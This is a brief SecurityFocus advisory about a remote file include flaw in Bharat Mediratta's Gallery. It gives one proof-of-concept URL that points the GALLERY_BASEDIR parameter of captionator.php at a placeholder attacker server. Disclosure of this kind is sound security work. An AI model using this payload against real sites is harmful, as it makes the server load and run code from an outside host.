Bharat Mediratta Gallery Remote File Include Vulnerability

The following proof of concept was provided by avart@gmx.de:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/


 

Privacy Statement
Copyright 2010, SecurityFocus